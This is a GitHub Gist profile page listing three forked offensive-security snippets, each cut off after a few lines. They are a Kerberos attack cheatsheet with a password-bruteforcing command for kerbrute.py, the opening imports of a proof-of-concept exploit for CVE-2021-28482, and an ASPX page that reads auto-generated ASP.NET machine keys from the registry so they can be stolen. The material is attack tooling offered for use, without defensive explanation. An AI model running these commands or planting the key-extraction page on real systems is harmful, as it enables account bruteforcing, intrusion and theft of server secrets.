Skip to content

Instantly share code, notes, and snippets.

View Xurse's full-sized avatar

Xurse

0 followers · 4 following
View GitHub Profile
@Xurse
Xurse / kerberos_attacks_cheatsheet.md
Created July 9, 2021 07:30 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@Xurse
Xurse / PoC_CVE-2021-28482.py
Created May 4, 2021 11:48 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@Xurse
Xurse / machineKeyFinder.aspx
Created December 28, 2020 14:37 — forked from irsdl/machineKeyFinder.aspx
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)